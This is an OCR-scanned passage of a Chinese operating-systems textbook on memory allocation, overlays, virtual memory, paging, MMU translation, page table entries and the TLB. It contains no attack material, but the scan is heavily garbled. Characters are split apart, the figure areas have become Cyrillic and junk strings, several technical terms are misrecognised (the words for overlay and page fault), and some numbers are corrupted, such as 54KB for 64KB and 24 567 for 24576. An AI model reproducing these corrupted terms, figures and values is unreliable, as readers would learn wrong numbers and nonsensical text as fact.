第 二 个 字 指 向 下 一 个 空闲 区 。 于 是 就 不 再 需要 图 3-6c 中 所 示 的 那些 三 个 字 加 一 位 (РУН) 的 链表 结 点 了 。 

另 一 种 分 配 算法 称 为 快速 适 配 (quick fit) 算法 ， 它 为 那些 常用 大 小 的 空闲 区 维护 单独 的 链表 。 例 如 ， 
有 一 个 nm 项 的 表 ， 该 表 的 第 一 项 是 指向 大 小 为 4KB 的 空闲 区 链表 表 头 的 指针 ， 第 二 项 是 指向 大 小 为 8KB 的 
空闲 区 链表 表 头 的 指针 ， 第 三 项 是 指向 大 小 为 12KB 的 空闲 区 链表 表 头 的 指针 ， 以 此 类 推 。 像 21KB 这 样 
的 空闲 区 既 可 以 放 在 20KB 的 链表 中 ， 也 可 以 放 在 一 个 专门 存放 大 小 比较 特别 的 空闲 区 的 链表 中 。 

快速 适 配 算法 寻找 一 个 指定 大 小 的 空闲 区 是 十 分 快速 的 ， 但 它 和 所 有 将 空闲 区 按 大 小 排序 的 方案 一 
样 都 有 一 个 共同 的 缺点 ， 即 在 一 个 进程 终止 或 被 换 出 时 ， 寻 找 它 的 相 邻 块 ， 查 看 是 否 可 以 合并 的 过 程 是 
非常 费时 的 。 如 果 不 进行 合并 ， 内 存 将 会 很 快 分 裂 出 大 量 的 进程 无 法 利用 的 小 空闲 区 。 


3.3 虚拟 内 存 

尽管 基 址 寄存 器 和 界限 寄存 器 可 以 用 于 创建 地 址 空间 的 抽象 ， 还 有 另 一 个 问题 需要 解决 ， 管 理 软 件 
的 膨胀 (bloatware) 。 虽 然 存 储 器 容量 增长 快速 ， 但 是 软件 大 小 的 增长 更 快 。 在 20 世 纪 80 年 代 ， 许 多 大 
学 用 一 台 4MB 的 VAX 计 算 机 运行 分 时 操作 的 系统 ， 供 十 几 个 用 户 (已 经 或 多 或 少 足够 满足 需要 了 ) 同时 
运行 。 现 在 微软 公司 为 单 用 户 Vista 系 统 推荐 至 少 512MB 内 存 ， 并 且 只 能 运行 简单 的 应 用 程序 ， 如 果 运 行 
复杂 应 用 程序 则 要 1GB 内 存 。 而 多 媒体 的 潮流 则 进一步 推动 了 对 内 存 的 需求 。 

这 一 发 展 的 结果 是 ， 需 要 运行 的 程序 往往 大 到 内 存 无 法 容纳 ， 而 且 必然 需要 系统 能 够 支持 多 个 程序 
同时 运行 ， 即 使 内 存 可 以 满足 其 中 单独 一 个 程序 的 需要 ， 但 总 体 来 看 ， 它 们 仍然 超出 了 内 存 大 小 。 交 换 
技术 (swapping) 并 不 是 一 个 有 吸引 力 的 解决 方案 ， 因 为 一 个 典型 的 SATA 磁 盘 的 峰值 传输 率 最 高 达到 
100MB/s， 这 意味 着 至 少 需要 10 秒 才能 换 出 一 个 1GB 的 程序 ， 并 需要 另 一 个 10 秒 才能 再 将 一 个 1GB 的 程 
序 换 入 。 

程序 大 于 内 存 的 问题 早 在 计算 时 代 开 始 就 产生 了 ， 虽 然 只 是 有 限 的 应 用 领域 ， 像 科学 和 工程 计算 
(模拟 字 宙 的 创建 或 模拟 新 型 航空 器 都 会 花费 大 量 内存 )。 在 20 世 纪 60 年 代 所 采取 的 解决 方法 是 : 把 程序 
分 割 成 许多 片段 ， 称 为 硫 差 (overlay)。 程 序 开始 执行 时 ， 将 覆盖 管理 模块 装 和 内存， 该 管理 模块 立即 
装 入 并 运行 覆 羡 0。 执行 完成 后 ， 覆 盖 0 通 知 管理 模块 装 入 覆盖 1， 或 者 占用 覆盖 0 的 上 方位 置 (如果 有 空 
间 )， 或 者 占用 覆盖 0 (如 果 没 有 空间 )。 一 些 覆 盖 系 统 非常 复杂 ， 允 许多 个 覆盖 块 同时 在 内 存 中 。 覆 盖 
块 存放 在 磁盘 上 ， 在 需要 时 由 操作 系统 动态 地 换 入 换 出 。 

虽然 由 系统 完成 实际 的 覆盖 块 换 和 人 换 出 操作 ， 但 是 程序 员 必须 把 程序 分 割 成 多 个 片段 。 把 一 个 大 程 
序 分 割 成 小 的 、 模 块 化 的 片段 是 非常 费时 和 枯燥 的 ， 并 且 易 于 出 错 。 很 少 程序 员 擅长 使 用 覆盖 技术 。 因 
此 ， 没 过 多 久 就 有 人 找到 一 个 办 法 ， 把 全 部 工作 都 交 给 计算 机 去 做 。 

采用 的 这 个 方法 (Fotheringham，1961) 称 为 虚拟 内 存 (virtual memory)。 虚 拟 内 存 的 基本 思想 是 : 
每 个 程序 拥有 自己 的 地 址 空间 ， 这 个 空间 被 分 割 成 多 个 块 ， 每 一 块 称 作 一 页 或 页 面 (page)。 每 一 页 有 
连续 的 地 址 范围 。 这 些 页 被 映射 到 物理 内 存 ， 但 并 不 是 所 有 的 页 都 必须 在 内 存 中 才能 运行 程序 。 当 程序 
引用 到 一 部 分 在 物理 内 存 中 的 地 址 空间 时 ， 由 硬件 立刻 执行 必要 的 映射 。 当 程序 引用 到 一 部 分 不 在 物理 
内 存 中 的 地 址 空间 时 ， 由 损 作 系统 负责 将 缺失 的 部 分 装 入 物理 内 存 并 重新 执行 失败 的 指令 。 

从 某 个 角度 来 讲 ， 虚 拟 内 存 是 对 基 址 寄存 器 和 界限 寄存 器 的 一 种 综合 。8088 为 正文 和 数据 分 离 出 专 
门 的 基 址 寄存 器 〈 但 不 包括 界限 寄存 器 ) 。 而 虚拟 内 存 使 得 整个 地 址 空间 可 以 用 相对 较 小 的 单元 映射 到 
物理 内 存 ， 而 不 是 为 正文 段 和 数据 段 分 别 进行 重 定位 。 下 面 会 介绍 虚拟 内 存 是 如 何 实现 的 。 

虚拟 内 存 很 适合 在 多 道 程序 设计 系统 中 使 用 ， 许 多 程序 的 片段 同时 保存 在 内 存 中 。 当 一 个 程序 等 待 
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它 的 一 部 分 读 入 内存 时 ， 可 以 把 CPU 交 给 另 一 个 进程 使 用 。 


3.3.1 分 页 

大 部 分 虚拟 内 存 系统 中 都 使 用 一 种 称 为 分 页 (paging) 的 技术 ， 我 们 现在 就 介绍 这 一 技术 。 在 任何 
一 台 计算 机 上 ， 程 序 引 用 了 一 组 内 存 地 址 。 当 程序 执行 指令 

MOV REG，1000 


时 ， 它 把 地 址 为 1000 的 内 存单 元 的 内 容 复 制 到 REG 中 (或 者 相反 ， 这 取决 于 计算 机 的 型 号 ) 。 地 址 可 以 
通过 索引 、 基 址 寄存 器 、 段 寄存 器 或 其 他 方式 产生 。 

由 程序 产生 的 这 些 地 址 称 为 虚拟 地 址 (virtual address) ， 它 们 构成 了 一 个 虚拟 地 址 空间 (virtual address 
space)。 在 没有 虚拟 内 存 的 计算 机 上 ， 系 统 直接 将 虚拟 地 址 送 到 内 存 总 线 上 ， 读 写 操作 使 用 具有 同样 地 址 的 
物理 内 存 字 ， 而 在 使 用 虚拟 内 存 的 情况 下 ， 虚 拟 地 址 不 是 被 直接 送 到 内 存 总 线 上 ， 而 是 被 送 到 内 存 管 理 单 
元 (Memory Management Unit，MMU)，MMU 把 虚拟 地 址 映射 为 物理 内 存 地址 ， 如 图 3-8 所 示 。 

图 3-9 中 一 个 简单 的 例子 说 明了 这 种 映射 是 如 何 工作 的 。 在 这 个 例子 中 ， 有 一 台 可 以 产生 16 位 地 址 
的 计算 机 ， 地 址 范围 从 0 到 64K， 且 这 些 地 址 是 虚拟 地 址 。 然 而 ， 这 台 计 算 机 只 有 32KB 的 物理 内 存 ， 因 
此 ， 虽 然 可 以 编写 54KB 的 程序 ， 但 它们 却 不 能 被 完全 调和 人 内存 运行 。 在 磁盘 上 必须 有 一 个 可 以 大 到 
64KB 的 程序 核心 映像 的 完整 副本 ， 以 保证 程序 片段 在 需要 时 能 被 调 入 内存。 


虚拟 地 
址 空间 
вок-вак[ х 
56К вок [х |) 虚拟 页 面 
52К ~56K | х 
48K~52K х 
44K~48K 7 
CPU 发 送 虚拟 地 址 给 MMU， 40K ~44K |х 物理 内 
CpU 包 36K ~40K | 5 存 Wah 
32K ~36K | x ма 
CPU 28K ~32K [X 28K~32K 
24K -28K [x 24K ~ 28K 
20K— 24k [з 20K~24K 
16K ~20K [—4 16K ~20K 
12K~ 16K |o 12K ~ 16K 
8K~ 12K [一 6 8K~12K 
4K- 8K | 4K ~8K 
MMU 发 送 物理 地 址 жа Мк 
给 存储 器 页 框 


图 3-8 MMU 的 位 置 和 功能 。 这 里 MMU 作 为 CPU 芯 片 的 。 图 3-9 页 表 给 出 虚拟 地 址 与 物理 内 存 地 址 之 间 
-部 分 ， 因 为 通常 就 是 这 样 做 的 。 不 过 从 逻辑 上 看 ， 它 ”的 映射 关系 。 每 一 页 起 始 于 4096 的 倍数 位 置 ， 
可 以 是 一 片 单独 的 芯片 ， 并 且 早 就 已 经 这 样 了 结束 于 起 址 加 4095， 所 以 4K 到 8K 实 际 为 

4096~8191，8K 到 12K 就 是 8192~12 287 


虚拟 地 址 空间 按照 固定 大 小 划分 成 称 为 页 面 (раве) 的 若干 单元 。 在 物理 内 存 中 对 应 的 单元 称 为 页 
框 (page frame)。 页 面 和 页 框 的 大 小 通常 是 一 样 的 ， 在 本 例 中 是 4KB， 现 有 的 系统 中 常用 的 页 大 小 一 般 
从 512 字 节 到 64KB。 对 应 于 64KB 的 虚拟 地 址 空间 和 32KB 的 物理 内 存 ， 我 们 得 到 16 个 虚拟 页 面 和 8 个 页 
框 。RAM 和 磁盘 之 间 的 交换 总 是 以 整个 页 面 为 单元 进行 的 。 

图 3-9 中 的 标记 符号 如 下 : 标记 0K~4K 的 范围 表示 该 页 的 虚拟 地 址 或 物理 地 址 是 0~4095。4K~8K 的 
范围 表示 地 址 4096~8191， 等 等 。 每 一 页 包含 了 4096 个 地 址 ， 起 始 于 4096 的 整数 倍 位 置 ， 结 束 于 4096 倍 
数 缺 1。 

当 程 序 试图 访问 地 址 0 时 ， 例 如 执行 下 面 这 条 指令 

MOV REG, 0 
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将 虚拟 地 址 0 送 到 MMU。MMU 看 到 虚拟 地 址 落 在 页 面 0 (0~4095) ， 根 据 其 映射 结果 ， 这 一 页 面 对 应 的 
是 页 框 2 (8192~12 287)， 因 此 MMU 把 地 址 变换 为 8192， 并 把 地 址 8192 送 到 总 线 上 。 内 存 对 MMU 一 无 
所 知 ， 它 只 看 到 一 个 读 或 写 地 址 8192 的 请 求 并 执行 它 。MMU 从 而 有 效 地 把 所 有 从 0~4095 的 虚拟 地 址 映 
射 到 了 8192~12 287 的 物理 地 址 。 

同样 地 ， 指 令 

MOV ВЕС, 8192 
被 有 效 地 转换 为 ， 

MOV REG, 24576 
因为 虚拟 地 址 8192 (在 虚拟 页 面 2 中 ) 被 映射 到 物理 地 址 24 567 (在 物理 页 框 6 中 ) 上 。 第 三 个 例子 ， 虚 
拟 地 址 20 500 在 距 虚拟 页 面 5 (虚拟 地 址 20 480-24 575) 起 始 地 址 20 字 节 处 ， 并 且 被 映射 到 物理 地 址 
12 288 +20= 12 308, 

通过 恰当 地 设置 MMU， 可 以 把 16 个 虚拟 页 面 映射 到 8 个 页 框 中 的 任何 一 个 。 但 是 这 并 没有 解决 虚拟 
地 址 空间 比 物理 内 存 大 的 问题 。 在 图 3-9 中 只 有 8 个 物理 页 框 ， 于 是 只 有 8 个 虚拟 页 面 被 映射 到 了 物理 内 
存 中 ， 在 图 3-9 中 用 叉 号 表示 的 其 他 页 并 没有 被 映射 。 在 实际 的 硬件 中 ， 用 一 个 “在 /不 在 ”位 
(present/absent bit) 记录 页 面 在 内 存 中 的 实际 存在 情况 。 

当 程序 访问 了 一 个 未 映射 的 页 面 ， 例 如 执行 指令 

МОУ REG, 32780 
将 会 发 生 什么 情况 呢 ? 虚拟 页 面 8 (从 32 768 开 始 ) 的 第 12 个 字 节 所 对 应 的 物理 地 址 是 什么 呢 ? MMU 注 
意 到 该 页 面 没有 被 映射 (在 图 中 用 叉 号 表示 ) ， 于 是 使 CPU 陷 人 到 操作 系统 ， 这 个 陷阱 称 为 款 页 中 断 
(page fault) 。 操 作 系统 找到 一 个 很 少 使 用 的 页 框 且 把 它 的 内 容 写 入 磁 盘 (如 果 它 不 在 磁盘 上 )。 随 后 把 
需要 访问 的 页 面 读 到 刚才 回收 的 页 框 中 ， 修 改 映射 关系 ， 然 后 重新 启动 引起 陷阱 的 指令 。 

例如 ， 如 果 操作 系统 决定 放弃 页 框 1， 那 么 它 将 把 虚拟 页 面 8 装 入 物理 地 址 8192， 并 对 MMU 映 射 做 两 
处 修改 。 首 先 ， 它 要 标记 虚拟 页 面 1 表 项 为 未 映 


射 ， 使 以 后 任何 对 虚拟 地 址 4096~8191 的 访问 都 ан» 
导致 陷阱 。 随 后 把 虚拟 页 面 8 的 表 项 的 又 号 改 为 1， ER Ci 
因此 在 引起 陷阱 的 指令 重新 启动 时 ， 它 将 把 虚拟 519 
地 址 32780 映 射 为 物理 地 址 4108 (4096+12), аГою [о 

下 面 查看 一 下 MMU 的 内 部 结构 以 便 了 解 它 рэв | 
是 怎么 工作 的 ， 以 及 了 解 为 什么 我 们 选用 的 页 面 Еи 
大 小 都 是 2 的 整数 次 署 。 在 图 3-10 中 可 以 看 到 一 个 9101 11 直接 从 输入 复 
虚拟 地 址 的 例子 ， 虚 拟 地 址 8196 (二 进 制 是 |та 2-00-00 制 到 输出 的 12 
0010000000000100) 用 图 3-9 所 示 的 MMU 了 映射 机 SHEY са 
制 进行 映射 ， 输 入 的 16 位 虚拟 地 址 被 分 为 4 位 的 页 «Бе 
号 和 12 位 的 偏 移 量 ,4 位 的 页 号 可 以 表示 16 个 页 面 ， HH 
ҮШ ЕЕ ЕГУ — TER ARAO E a, ER 

可 用 页 号 作为 页 表 (page table) 的 索引 ， 以 ай 
得 出 对 应 于 该 虚拟 页 面 的 页 框 号 。 如 果 “ 在 /不 在 ” 人 
位 是 0， 则 将 引起 一 个 操作 系统 陷阱 。 如 果 该 位 ЕЕ Мала ПИ а 
是 1， 则 将 在 页 表 中 查 到 的 页 杠 号 复制 到 输出 寄 (048987575128 еее] (819%) 


存 器 的 高 3 位 中 ， 再 加 上 输入 虚拟 地 址 中 的 低 12 
位 偏 移 量 。 如 此 就 构成 了 15 位 的 物理 地 址 。 输 出 图 3-10 在 16 个 4KB 页 面 情况 下 MMU 的 内 部 操作 
寄存 器 的 内 容 随即 被 作为 物理 地 址 送 到 内 存 总 线 。 
3.3.2 пж 

作为 一 种 最 简单 的 实现 ， 虚 拟 地 址 到 物理 地 址 的 映射 可 以 概括 如 下 :虚拟 地 址 被 分 成 虚拟 页 号 (高 
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位 部 分 ) MAE OERA) 两 部 分 。 例 如 ， 对 于 16 位 地 址 和 4KB 的 页 面 大 小 ， 高 4 位 可 以 指定 16 个 
虚拟 页 面 中 的 一 页 ， 而 低 12 位 接着 确定 了 所 选 页 面 中 的 字 节 偏 移 量 (0~4095) 。 但 是 使 用 3 或 者 5 或 者 其 
他 位 数 拆 分 虚拟 地 址 也 是 可 行 的 。 不 同 的 划分 对 应 不 同 的 页 面 大 小 。 

虚拟 页 号 可 用 做 页 表 的 索引 ， 以 找到 该 虚拟 页 面 对 应 的 页 表 项 。 由 页 表 项 可 以 找到 页 框 号 (如 果 有 
的 话 )。 然 后 把 页 框 号 拼接 到 偏 移 量 的 高 位 端 ， 以 赫 换 掉 虚 拟 页 号 ， 形 成 送 往 内 存 的 物理 地 址 。 

页 表 的 目的 是 把 虚拟 页 面 映射 为 页 框 。 从 数学 角度 说 ， 页 表 是 一 个 函数 ， 它 的 参数 是 虚报 页 号 ， 结 
朵 是 物理 页 框 号 。 通 过 这 个 函数 可 以 把 虚拟 地 址 中 的 虚拟 页 面 域 替换 成 页 柜 域 ， 从 而 形成 物理 地 址 。 

页 表 项 的 结构 

下 面 将 讨论 单个 页 表 项 的 细节 。 页 表 项 的 结构 是 与 机 器 密切 相关 的 ， 但 不 同 机 器 的 页 表 项 存储 的 信 
息 部 大 致 相同。 图 3-11 中 给 出 了 页 表 项 的 一 个 yaa 


例子 。 不 同 计算 机 的 页 表 项 大 小 可 能 不 一 样 ， 。 “禁止 位 修改 位 “在 /不 在 " 位 

但 32 位 是 一 个 常用 的 大 小 。 最 重要 的 域 是 页 杠 ©; 

号 。 毕 竞 页 映射 的 目的 是 找到 这 个 值 ， 其 次 是 а TES 
“在 /不 在 * 位， 这 一 位 是 1 时 表示 该 表 项 是 有 效 a a, 

的 ， 可 以 使 用 ， 如 果 是 0， 则 表示 该 表 项 对 应 的 ине 

虚拟 页 面 现在 不 在 内 存 中 ， 访 问 读 页 面 会 引起 图 3-11 一 个 典型 的 页 表 项 


一 个 缺 页 中 断 。 

“保护 ”(protection) 位 指出 一 个 页 允许 什么 类 型 的 访问 。 最 简单 的 形式 是 这 个 域 只 有 一 位 ，0 表 示 
读 / 写 ，! 表 示 只 读 。 一 个 更 先进 的 方法 是 使 用 三 位 ， 各 位 分 别 对 应 是 否 启用 读 、 写 、 执 行 该 页 面 。 

为 了 记录 页 面 的 使 用 状况 ， 引 入 了 “修改 ”(modified) 位 和 “访问 ”(referenced) 位 。 在 写 人 一 页 
时 由 硬件 自动 设置 修改 位 。 该 位 在 操作 系统 重新 分 配 页 框 时 是 非常 有 用 的 。 如 果 一 个 页 面 已 经 被 修改 过 
( 即 它 是 “ 腑 ”的 )， 则 必须 把 它 写 回 磁盘 。 如 果 一 个 页 面 没 有 被 修改 过 ( 即 它 是 “干净 ”的 )， 则 只 简 
单 地 把 它 丢 弃 就 可 以 了 ， 因 为 它 在 磁盘 上 的 副本 仍然 是 有 效 的 。 这 一 位 有 时 也 被 称 为 脏 位 (dirty bit), 
因为 它 反映 了 该 页 面 的 状态 。 

不 论 是 读 还 是 写 ， 系 统 都 会 在 该 页 面 被 访问 时 设置 访问 位 。 它 的 值 被 用 来 帮助 操作 系统 在 发 生 缺 页 
中 断 时 选择 要 被 淘汰 的 页 面 。 不 再 使 用 的 页 面 要 比 正在 使 用 的 页 面 更 适合 淘汰 。 这 一 位 在 即将 讨论 的 很 
多 页 面 置换 算法 中 都 会 起 到 重要 的 作用 。 

最 后 一 位 用 于 禁止 该 页 面 被 高 速 缓 在 。 对 那些 映射 到 设备 寄存 器 而 不 是 常规 内 存 的 页 面 而 言 ， 这 个 
特性 是 非常 重要 的 。 假 如 操作 系统 正在 紧张 地 循环 等 待 某 个 IO 设备 对 它 刚 发 出 的 命令 作出 响应 ， 保证 
硬件 是 不 断 地 从 设备 中 读 取 数据 而 不 是 访问 一 个 旧 的 被 高 速 缓存 的 副本 是 非常 重要 的 。 通过 这 一 位 可 以 
禁止 高 速 缓 在。 具有 独立 的 UO 空 间 而 不 使 用 内 存 映射 1O 的 机 器 不 需要 这 一 位 。 

应 该 注意 的 是 ， 若 某 个 页 面 不 在 内 存 时 ， 用 于 保存 该 页 面 的 磁盘 地 址 不 是 页 表 的 一 部 分 。 原 因 很 简 
单 ， 页 表 只 保存 把 虚拟 地 址 转换 为 物理 地 址 时 硬件 所 需要 的 信息 。 操作 系统 在 处 理 缺 页 中 断 时 需要 把 该 
页 面 的 磁盘 地 址 等 信息 保存 在 操作 系统 内 部 的 软件 表格 中 。 硬 件 不 需要 它 。 

在 深入 到 更 多 应 用 实现 问题 之 前 ， 值 得 再 次 强调 的 是 : 虚拟 内 存 本 质 上 是 用 来 创造 一 个 新 的 抽象 概 
念 一 一 地 址 空间 ， 这 个 概念 是 对 物理 内 存 的 抽象 ， 类 似 于 进程 是 对 物理 机 器 (CPU) 的 抽象 。 虚拟 内 存 
的 实现 ， 是 将 虚拟 地 址 空间 分 解 成 页 ， 并 将 每 一 页 映射 到 物理 内 存 的 某 个 页 框 或 者 (暂时) 解除 映射 。 
因此 ， 本 章 的 基本 内 容 即 关于 操作 系统 创建 的 抽象 ， 以 及 如 何 管理 这 个 抽象 。 


3.33 加 速 分 页 过 程 

我 们 已 经 了 解 了 虚拟 内 存 和 分 页 的 基础 。 现 在 是 时 候 深 入 到 更 多 关于 可 能 的 实现 的 细节 中 去 了 。 在 
任何 分 页 式 系统 中 ， 都 需要 考虑 两 个 主要 问题 ; 

1) 虚拟 地 址 到 物理 地 址 的 映射 必须 非常 快 。 

2) 如 果 虚 拟 地 址 空间 很 大 ， 页 表 也 会 很 大 。 

第 一 个 问题 是 由 于 每 次 访问 内 存 ， 都 需要 进行 虚拟 地 址 到 物理 地 址 的 映射 。 所 有 的 指令 最 终 都 必须 
来 自 内存 ， 并 且 很 多 指令 也 会 访问 内 存 中 的 操作 数 。 因 此 ， 每 条 指令 进行 一 两 次 或 更 多 页 表 访 问 是 必要 
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的 。 如 果 执 行 一 条 指令 需要 lns， 页 表 查 询 必须 在 0.2ns 之 内 完成 ， 以 避免 映射 成 为 一 个 主要 瓶颈 。 

第 二 个 问题 来 自 现代 计算 机 使 用 至 少 32 位 的 虚拟 地 址 ,而 且 64 位 变 得 越 来 越 普遍 。 假 设 页 长 为 4KB， 
32 位 的 地 址 空间 将 有 100 万 页 ， 而 64 位 地 址 空间 简直 多 到 超 乎 你 的 想象 。 如 果 虚 拟 地 址 空间 中 有 100 万 个 
页 ， 那 么 页 表 必 然 有 100 万 条 表 项 。 另 外 请 记 住 ， 每 个 进程 都 需要 自己 的 页 表 (因为 它 有 自己 的 虚拟 地 
址 空间 ) 。 

对 大 而 快速 的 页 映射 的 需求 成 为 了 构建 计算 机 的 重要 约束 。 最 简单 的 设计 (至 少 从 概念 上 ) 是 使 用 
由 一 组 “快速 硬件 寄存 器 ”组 成 的 单一 页 表 ， 每 一 个 表 项 对 应 一 个 虚 页 ， 虚 页 号 作为 索引 ， 如 图 3-10 所 
示 。 当 启动 一 个 进程 时 ， 操 作 系统 把 保存 在 内 存 中 的 进程 页 表 的 副本 载 入 到 寄存 器 中 。 在 进程 运行 过 程 
H, 不必 再 为 页 表 而 访问 内 存 。 这 个 方法 的 优势 是 简单 并 且 在 映射 过 程 中 不 需要 访问 内 存 。 而 缺点 是 在 
页 表 很 大 时 ， 代 价 高 昂 。 而 且 每 一 次 上 下 文 切换 都 必须 装载 整个 页 表 ， 这 样 会 降低 性 能 。 

另 一 种 极端 方法 是 ， 整 个 页 表 都 在 内 存 中 。 那 时 所 需 的 硬件 仅仅 是 一 个 指向 页 表 起 始 位 置 的 寄存 器 。 
这 样 的 设计 使 得 在 上 下 文 切 换 时 ， 进 行 “ 虚 拟 地 址 到 物理 地 址 ”的 映射 只 需 重新 装 人 一 个 寄存 器 。 当 然 ， 
这 种 做 法 的 缺陷 是 在 执行 每 条 指令 时 ， 都 需要 一 次 或 多 次 内 存 访 问 ， 以 完成 页 表 项 的 读 入 ， 速 度 非常 慢 。 

1. 转换 检测 缓冲 区 

现在 讨论 加 速 分 页 机 制 和 处 理 大 的 虚拟 地 址 空间 的 实现 方案 ， 先 介绍 加 速 分 页 问题 。 大 多 数 优化 技 
术 都 是 从 内 存 中 的 页 表 开始 的 。 这 种 设计 对 效率 有 着 巨大 的 影响 。 例 如 ， 假 设 一 条 指令 要 把 一 个 寄存 器 
中 的 数据 复制 到 另 一 个 寄存 器 。 在 不 分 页 的 情况 下 ， 这 条 指令 只 访问 一 次 内 存 ， 即 从 内 存 中 取 指 令 。 有 
了 分 页 后 ， 则 因为 要 访问 页 表 而 引起 更 多 次 的 访问 内 存 。 由 于 执行 速度 通常 被 CPU 从 内 存 中 取 指令 和 数 
据 的 速度 所 限制 ， 所 以 每 次 内 存 访问 必须 进行 两 次 页 表 访问 会 降低 一 半 的 性 能 。 在 这 种 情况 下 ， 没 人 会 
采用 分 页 机 制 。 

多 年 以 来 ， 计 算 机 的 设计 者 已 经 意识 到 了 这 个 问题 ， 并 找到 了 一 种 解决 方案 。 这 种 解决 方案 的 建立 
基于 这 样 一 种 现象 : 大 多 数 程序 总 是 对 少量 的 页 面 进行 多 次 的 访问 ， 而 不 是 相反 的 。 因 此 ， 只 有 很 少 的 
页 表 项 会 被 反复 读 取 ， 而 其 他 的 页 表 项 很 少 被 访问 。 

上 面 提 到 的 解决 方案 是 为 计算 机 设置 一 个 小 型 的 硬件 设备 ， 将 虚拟 地 址 直接 映射 到 物理 地 址 ， 而 不 
必 再 访问 页 表 。 这 种 设备 称 为 转换 检测 线 冲 区 (Translation Lookaside Buffer，TLB)， 有 时 又 称 为 相 联 
Afk (associate memory) ， 如 图 3-12 所 示 。 它 通常 在 MMU 中 ， 包 含 少量 的 表 项 ， 在 此 例 中 为 8 个 ， 在 
实际 中 很 少 会 超过 64 个 。 每 个 表 项 记录 了 一 个 页 面 的 相关 信息 ， 包 括 虚拟 页 号 、 页 面 的 修改 位 、 保 护 码 
( 读 / 写 /执行 权限 ) 和 该 页 所 对 应 的 物理 页 框 。 除 了 虚拟 页 号 (不 是 必须 放 在 页 表 中 的 )， 这 些 域 与 页 表 
中 的 域 是 一 一 对 应 的 。 另 外 还 有 一 位 用 来 记录 这 个 表 项 是 否 有 效 ( 即 是 否 在 使 用 )。 

如 果 一 个 进程 在 虚拟 地 址 19、20 和 21 之 间 


有 一 个 循环 ， 那 么 可 能 会 生成 图 3-12 中 的 TLB。 PAC PUNES нш | тры | дєє 

因此 ， 这 三 个 表 项 中 有 可 读 和 可 执行 的 保护 码 。 о | o nx | a] 

当前 主要 使 用 的 数据 (假设 是 个 数组 ) 放 在 页 面 Ci | эю т Ган | 区 

129 和 页 面 130 中 。 页 面 140 包 含 了 用 于 数组 计算 [з | сэ | т Гам вг 

ЮЖ. 最后， 堆栈 位 于 页 面 860 和 页 面 861。 1| э» | o ах EJ 
现在 看 一 下 TLB 是 如 何 工作 的 。 将 一 个 虚拟。 H 2 2—8 s 

地 址 放 入 MMU 中 进行 转换 时 ， 硬 件 首先 通过 将 。 | 人 2， тш е 


该 虚拟 页 号 与 TLB 中 所 有 表 项 同时 ( 即 并 行 ) ЖОО т»; 
行 匹配 ， 判 断 虚拟 页 面 是 否 在 其 中 。 如 果 发 现 了 图 3-12 TLB 加 速 分 页 
-个 有 效 的 匹配 并 且 要 进行 的 访问 操作 并 不 违反 保护 位 ， 则 将 页 框 号 直接 从 TLB 中 取出 而 不 必 再 访问 页 
表 。 如 果 虚 拟 页 面 号 确实 是 在 TLB 中 ， 但 指令 试图 在 一 个 只 读 页 面 上 进行 写 操作 ， 则 会 产生 一 个 保护 错 
误 ， 就 像 对 页 表 进 行 非法 访问 一 样 。 

当 虚 拟 页 号 不 在 TLB 中 时 发 生 的 事情 值得 讨论 。 如 果 MMU 检 测 到 没有 有 效 的 匹配 项 时 ， 就 会 进行 
正常 的 页 表 碍 询 。 接 着 从 TLB 中 淘汰 一 个 表 项 ， 然 后 用 新 找到 的 页 表 项 代替 它 。 这 样 ， 如 果 这 -页 面 委 
快 再 被 访问 ， 第 二 次 访问 TLB 时 自然 将 会 命中 而 不 是 不 命中 。 当 一 个 表 项 被 清除 出 TLB 时 ， 将 修改 位 复 
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制 到 内 存 中 的 页 表 项 ， 而 除了 访问 位 ， 其 他 的 值 不 变 。 当 页 表 项 中 从 页 表 装 和 人 到 TLB 中 时 ， 所 有 的 值 都 
来 自 内 存 。 

2. 软件 TLB 管 理 

到 目前 为 止 ， 我 们 已 经 假设 每 一 台 具 有 虚拟 内 存 的 机 器 都 具有 由 硬件 识别 的 页 表 ， 以 及 一 个 TLB 。 
在 这 种 设计 中 ， 对 TLB 的 管理 和 TLB 的 失效 处 理 都 完全 由 MMU 硬 件 来 实现 。 只 有 在 内 存 中 没有 找到 某 
个 页 面 时 ， 才 会 陷入 到 操作 系统 中 。 

在 过 去 ， 这 样 的 假设 是 正确 的 。 但 是 ， 许 多 现代 的 RISC 机 器 ， 包 括 SPARC、MIPS 以 及 HP PA， 几 
乎 所 有 的 页 面 管理 都 是 在 软件 中 实现 的 。 在 这 些 机 器 上 ， TLB 表 项 被 操作 系统 显 式 地 装载 。 当 发 生 TLB 
访问 失效 ， 不 再 是 由 MMU 到 页 表 中 查找 并 取出 需要 的 页 表 项 ， 而 是 生成 一 个 TLB 失 效 并 将 问题 交 给 操 
作 系统 解决 。 系 统 必须 先 找到 该 页 面 ， 然 后 从 TLB 中 删除 一 个 项 ， 接着 装载 一 个 新 的 项 ， 最 后 再 执行 先 
前 出 错 的 指令 。 当 然 ， 所 有 这 一 切 都 必须 在 有 限 的 几 条 指令 中 完成 ， 因为 TLB 失 效 比 缺 页 中 断 发 生 的 更 
加 频繁 。 

让 人 感到 惊奇 的 是 ， 如 果 TLB 大 (如 64 个 表 项 ) 到 可 以 减少 失效 率 时 ， TLB 的 软件 管理 就 会 变 得 足 
够 有 效 。 这 种 方法 的 最 主要 的 好 处 是 获得 了 一 个 非常 简单 的 MMU ， 这 就 在 CPU 芯片 上 为 高 速 缓存 以 及 
其 他 改善 性 能 的 设计 腾 出 了 相当 大 的 空间 。Uhlig 等 人 在 论文 (Uhlig，1994) 中 讨论 过 软件 TLB 管 理 。 

到 目前 为 止 ， 已 经 开发 了 多 种 不 同 的 策略 来 改善 使 用 软件 TLB 管 理 的 机 器 的 性 能 。 其 中 一 种 策略 是 
在 减少 TLB 失 效 的 同时 ， 又 要 在 发 生 TLB 失 效 时 减少 处 理 开 销 (Bala 等 人 ，1994)。 为 了 减少 TLB 失 效 ， 
有 时 候 操作 系统 能 用 “直觉 ” 指出 哪些 页 面 下 一 步 可 能 会 被 用 到 并 预先 为 它们 在 TLB 中 装载 表 项 。 例如 ， 
当 一 个 客户 进程 发 送 一 条 消息 给 同一 台 机 器 上 的 服务 器 进程 ， 很 可 能 服务 器 将 不 得 不 立即 运行 。 了 解 了 
这 一 点 ， 当 执行 处 理 send 的 陷阱 时 ， 系 统 也 可 以 找到 服务 器 的 代码 页 . 数据 页 以 及 堆栈 页 ， 并 在 有 可 能 
导致 TLB 失 效 前 把 它们 装载 到 TLB 中 。 

